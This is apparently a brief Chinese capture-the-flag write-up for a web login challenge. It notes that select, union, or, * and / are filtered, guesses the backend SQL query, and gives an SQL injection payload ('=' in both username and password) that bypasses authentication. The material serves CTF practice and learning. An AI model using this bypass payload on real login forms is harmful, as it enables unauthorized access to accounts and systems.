地址:http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
参考资料:https://blog.csdn.net/wy_97/article/details/75635661 https://blog.csdn.net/qq_35078631/article/details/54782596 补充资料:https://blog.csdn.net/LANVNAL/article/details/56965963
分析: * / select union or 都被过滤
猜测后台查询语句:$sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”;
当 username:1 password:1 时
$sql ="select user from flag where user='1' and password='1' ";
目前的目的是成功登陆,即SQL查询不报错
构造: username:’=’ password:’=’
效果:$sql ="select user from flag where user='NULL'='NULL' and password='NULL'='NULL' "; 【单引号中的内容为空,条件成立,未报错】【万能密码】
